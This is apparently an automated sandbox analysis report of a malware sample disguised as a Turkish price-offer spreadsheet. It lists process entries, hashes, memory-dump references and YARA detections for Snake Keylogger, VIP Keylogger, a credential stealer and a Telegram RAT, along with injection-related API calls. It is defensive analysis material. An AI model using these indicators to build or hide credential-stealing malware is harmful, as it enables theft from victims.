                                                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                                Imagebase:0x620000
                                                File size:42'064 bytes
                                                MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000004.00000002.4496902509.0000000002A11000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000004.00000002.4490658108.0000000000434000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.4496902509.0000000002B1A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:moderate
                                                Has exited:false

                                                Target ID:6
                                                Start time:06:45:16
                                                Start date:08/10/2024
                                                Path:C:\Users\user\AppData\Roaming\Tojeiuai.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\AppData\Roaming\Tojeiuai.exe"
                                                Imagebase:0x250000
                                                File size:2'394'624 bytes
                                                MD5 hash:1E9DC5041BF503CB63397E6A8F0BAE9A
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000006.00000002.2251979049.0000000002799000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.2251979049.0000000002AC7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.2272906135.000000000380B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000006.00000002.2272906135.000000000380B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000006.00000002.2272906135.000000000380B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000006.00000002.2272906135.000000000380B000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                Reputation:low
                                                Has exited:true

                                                Target ID:7
                                                Start time:06:45:17
                                                Start date:08/10/2024
                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                                Imagebase:0xa20000
                                                File size:42'064 bytes
                                                MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000007.00000002.4495336578.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000007.00000002.4490630405.0000000000435000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.4495336578.0000000002EAC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:moderate
                                                Has exited:false


                                                  Execution Graph

                                                  Execution Coverage:12.4%
                                                  Dynamic/Decrypted Code Coverage:100%
                                                  Signature Coverage:14.1%
                                                  Total number of Nodes:313
                                                  Total number of Limit Nodes:21
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: ,aq$4$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
                                                  • API String ID: 0-3443518476
                                                  • Opcode ID: 5bd7ac0cb408ec1a4f7eb287789fc885b1f4a69fe1b3cdf9aa5d878a3acbea86
                                                  • Instruction ID: eb2b31667294de6e9fed030d9bcb6d33fe740d987c6b0fd10b1c65312060d01d
                                                  • Opcode Fuzzy Hash: 5bd7ac0cb408ec1a4f7eb287789fc885b1f4a69fe1b3cdf9aa5d878a3acbea86
                                                  • Instruction Fuzzy Hash: 0BB23974A002189FDB14DFA9C994FADB7B6FF48710F148599E516AB2A4CB70EC81CF60
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: ,aq$4$$]q$$]q$$]q$$]q
                                                  • API String ID: 0-324474496
                                                  • Opcode ID: 54ba36d3bba44c9e5ce80811e59d932b1ccb657ead942dc1169e27996c781234
                                                  • Instruction ID: 36601b54c12c82710c8977dd25944388c3f3b7bbc66d9528d71222831cdf12b9
                                                  • Opcode Fuzzy Hash: 54ba36d3bba44c9e5ce80811e59d932b1ccb657ead942dc1169e27996c781234
                                                  • Instruction Fuzzy Hash: 1F22FB74A002149FDB14DF65C994FADB7B2FF48714F1481A9E50AAB2A5DB30ED82CF60

                                                  Control-flow Graph

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2043156959.0000000003110000.00000040.00000800.00020000.00000000.sdmp, Offset: 03110000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3110000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: TJbq$Te]q$paq$xb`q
                                                  • API String ID: 0-4160082283
                                                  • Opcode ID: 50372a54be8138ecd864ab7a606b9692dcfdcbf1ec5866d77c9ae2907b568b4d
                                                  • Instruction ID: 0afb0aa7c0e0795f336bdc4d333f2f9ab711003380b07d01191a1950ee7330ca
                                                  • Opcode Fuzzy Hash: 50372a54be8138ecd864ab7a606b9692dcfdcbf1ec5866d77c9ae2907b568b4d
                                                  • Instruction Fuzzy Hash: 3FA2C575A00228CFDB65CF69C984AD9BBB2FF89304F1581E9D509AB325DB319E91CF40

                                                  Control-flow Graph

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062894780.0000000005B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5b10000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: fbq$8
                                                  • API String ID: 0-3186246319
                                                  • Opcode ID: 1479a3acad20de81e77c757f62117cecc9829d752cef1686bda691d596b3ac3d
                                                  • Instruction ID: 7bf25f3bd52444d9860015b796678dc899e7e4156045bb73849b047080bb599f
                                                  • Opcode Fuzzy Hash: 1479a3acad20de81e77c757f62117cecc9829d752cef1686bda691d596b3ac3d
                                                  • Instruction Fuzzy Hash: 5F42C375D016298BDB64DF69C890AD9F7B2BF89310F5486EAD40DA7250DB30AE81CF90

                                                  Control-flow Graph

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2043156959.0000000003110000.00000040.00000800.00020000.00000000.sdmp, Offset: 03110000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3110000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $%
                                                  • API String ID: 0-2111875603
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062894780.0000000005B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5b10000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: fbq$h
                                                  • API String ID: 0-3598783323
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2061579609.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_57e0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 2
                                                  • API String ID: 0-450215437
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Te]q
                                                  • API String ID: 0-52440209
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Te]q
                                                  • API String ID: 0-52440209
                                                  APIs
                                                  • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 05B14F05
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062894780.0000000005B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5b10000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID: MemoryProtectVirtual
                                                  • String ID:
                                                  • API String ID: 2706961497-0
                                                  APIs
                                                  • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 05B14F05
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062894780.0000000005B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5b10000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID: MemoryProtectVirtual
                                                  • String ID:
                                                  • API String ID: 2706961497-0
                                                  APIs
                                                  • NtResumeThread.NTDLL(?,?), ref: 05B16416
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062894780.0000000005B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5b10000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID: ResumeThread
                                                  • String ID:
                                                  • API String ID: 947044025-0
                                                  APIs
                                                  • NtResumeThread.NTDLL(?,?), ref: 05B16416
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062894780.0000000005B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5b10000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID: ResumeThread
                                                  • String ID:
                                                  • API String ID: 947044025-0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062772103.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ae0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: PH]q
                                                  • API String ID: 0-3168235125
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062772103.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ae0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: PH]q
                                                  • API String ID: 0-3168235125
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2063678264.0000000005E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5e20000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Ddq
                                                  • API String ID: 0-562783569
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062894780.0000000005B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5b10000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID: 0-3916222277
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2061579609.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_57e0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Te]q
                                                  • API String ID: 0-52440209
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062894780.0000000005B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5b10000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID: 0-3916222277
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2061579609.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_57e0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Te]q
                                                  • API String ID: 0-52440209
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Te]q
                                                  • API String ID: 0-52440209
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062894780.0000000005B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5b10000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: C^[.
                                                  • API String ID: 0-1264493093
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2043156959.0000000003110000.00000040.00000800.00020000.00000000.sdmp, Offset: 03110000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3110000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID: 0-3916222277
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2063553048.0000000005E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5e00000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2061579609.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_57e0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062772103.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ae0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062772103.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ae0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062772103.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ae0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062894780.0000000005B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5b10000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b1bdd2169ae958442122a07d6534b9dadf1a582a93dd486bf7b1e6ec6567ae9f
                                                  • Instruction ID: 251928405cb0160fe292a9cfa42715d582eda44f5385fe089ecf84ead4b412c8
                                                  • Opcode Fuzzy Hash: b1bdd2169ae958442122a07d6534b9dadf1a582a93dd486bf7b1e6ec6567ae9f
                                                  • Instruction Fuzzy Hash: E7D138B0E06258CFDB54CFA9D984BADBBF2FB49300F5480A9E409A7294DB746D85CF05
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062894780.0000000005B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5b10000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 737f73dc3ef036516b328dc3632f479c416c8a1687c426f4deab3ad7acb96d94
                                                  • Instruction ID: dca40e7f9fcadfa367aa9d6fa94b76ec2d2444b0fb8e155500138fb16a4f3092
                                                  • Opcode Fuzzy Hash: 737f73dc3ef036516b328dc3632f479c416c8a1687c426f4deab3ad7acb96d94
                                                  • Instruction Fuzzy Hash: 5ED128B0E06258CFDB54CFA5D984BADBBF2FB49304F5080A9E409A7294DB746985CF05
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2063553048.0000000005E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5e00000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0411102746a02ae8819d62fca9c6c3c18aa18ceb06a31a76965a7dc22ef14492
                                                  • Instruction ID: 981d520a484cfd87ca6cf73e4eaf4636f908b74d606690fa11576d799171caa3
                                                  • Opcode Fuzzy Hash: 0411102746a02ae8819d62fca9c6c3c18aa18ceb06a31a76965a7dc22ef14492
                                                  • Instruction Fuzzy Hash: CDB11B74E06218CFDB58DFAAD844BADBBB2FB49304F10A1A9D449AB394DB345D85CF10
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062894780.0000000005B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5b10000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6c9821391dafa951c8be48951431247a65a92bc4f22e3a0c9ad9d72b4b762734
                                                  • Instruction ID: ed91c6a9ed36ef2ef99c12062ba383e2692641c7e57a1dede0ce6941a9618037
                                                  • Opcode Fuzzy Hash: 6c9821391dafa951c8be48951431247a65a92bc4f22e3a0c9ad9d72b4b762734
                                                  • Instruction Fuzzy Hash: D3B1D5B0D15218CFDB54CFAAD484BADBBF2FB49300F5481A9D80AAB355D7346986CF14
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062894780.0000000005B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5b10000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3b277756871d1c2155c378258e6bf635f4bbe8ef9c648f6a4ba7a089ee87e421
                                                  • Instruction ID: 99526c618d5bc792653c889bf3e5d183f7a2dc82f69abf3045343b0003eefbc9
                                                  • Opcode Fuzzy Hash: 3b277756871d1c2155c378258e6bf635f4bbe8ef9c648f6a4ba7a089ee87e421
                                                  • Instruction Fuzzy Hash: 06B1C4B0D15218CFDB54CFAAD484BADBBF2FB49300F5481AAD80AAB355D7346986CF14
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2043156959.0000000003110000.00000040.00000800.00020000.00000000.sdmp, Offset: 03110000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3110000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b116d2ef78530cb8d985872b6dc78874598c5d1080c3a5263bccdc3bbcb5cc90
                                                  • Instruction ID: edb59cdfcf731f0e2a0805df1bf51160c7fde4fa5a685442a93999ccfb6e854e
                                                  • Opcode Fuzzy Hash: b116d2ef78530cb8d985872b6dc78874598c5d1080c3a5263bccdc3bbcb5cc90
                                                  • Instruction Fuzzy Hash: 24818A31A04104CFDB14CE69D484BEEB7B3FBCE315F6581B5D10A9B664D7789891CB50
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2043156959.0000000003110000.00000040.00000800.00020000.00000000.sdmp, Offset: 03110000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3110000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d34a6d3908daa8fb086993e10e53199b29f525a73adcf31dbc40564b585d60f6
                                                  • Instruction ID: 0988c07afbcb106356ed3a309efd8564a13ceb5670c93ce65d08157cdaa88e6f
                                                  • Opcode Fuzzy Hash: d34a6d3908daa8fb086993e10e53199b29f525a73adcf31dbc40564b585d60f6
                                                  • Instruction Fuzzy Hash: 3B91E671A06104CFD728CF68D488BE9B7B2FB8C311F16C2A5D9169B2A5C375A8A5CF50
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062894780.0000000005B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5b10000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 65369a5a4a19566b67a61ddcb7035b80d80af4705c2a83b84d7959e78ec273f2
                                                  • Instruction ID: 759ace1e273f3109b0ca0419c84e0f57ef6018eaef63c8b0afd4154fd9a76a76
                                                  • Opcode Fuzzy Hash: 65369a5a4a19566b67a61ddcb7035b80d80af4705c2a83b84d7959e78ec273f2
                                                  • Instruction Fuzzy Hash: 8A8119B4A01209DFCF44DFA9D580AAEBBF6FF49300F508469E809AB354DB35AD41CB55
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2043156959.0000000003110000.00000040.00000800.00020000.00000000.sdmp, Offset: 03110000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3110000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 41ab1f6f7724dee470f3c3e5eac623956505fa8d8e96f6b960d91a136f9877af
                                                  • Instruction ID: d82c153562c26a20cb6b68f1ff782af1d80c22b357d4e4cbc3798aac7ef8e77d
                                                  • Opcode Fuzzy Hash: 41ab1f6f7724dee470f3c3e5eac623956505fa8d8e96f6b960d91a136f9877af
                                                  • Instruction Fuzzy Hash: 80813A71A05104CFDB28CF89D484BEAB7B3FB88311F2AC1B5D1059B659CB799DA2CB50
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2043156959.0000000003110000.00000040.00000800.00020000.00000000.sdmp, Offset: 03110000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3110000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8151d1d1484df557f32e3619810d214c6149639efc973ac6ef0cc59d7e5b3b4d
                                                  • Instruction ID: c9a5d674c5f262c19853d6cb3fa4c66a7b9c669455382e4e0b6d401056851cd5
                                                  • Opcode Fuzzy Hash: 8151d1d1484df557f32e3619810d214c6149639efc973ac6ef0cc59d7e5b3b4d
                                                  • Instruction Fuzzy Hash: 0491D774A06104CFD728CF68D488BE9F7B2FB8C311F16C2A5D9169B2A5C375A8A5CF50
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2043156959.0000000003110000.00000040.00000800.00020000.00000000.sdmp, Offset: 03110000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3110000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 88d73266c9b21af6a8c137c414be440c727d616115665a96b3124ca91203e95b
                                                  • Instruction ID: a9c28944918661b156ec2f0226d09a57ac0101b6e11ff6a74b70439c6f0bddb7
                                                  • Opcode Fuzzy Hash: 88d73266c9b21af6a8c137c414be440c727d616115665a96b3124ca91203e95b
                                                  • Instruction Fuzzy Hash: 39812930A05218CFD718CF59D684FE9F7B2FB88310F5582B5E9065B3A9D735A891CB80
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2043156959.0000000003110000.00000040.00000800.00020000.00000000.sdmp, Offset: 03110000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3110000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
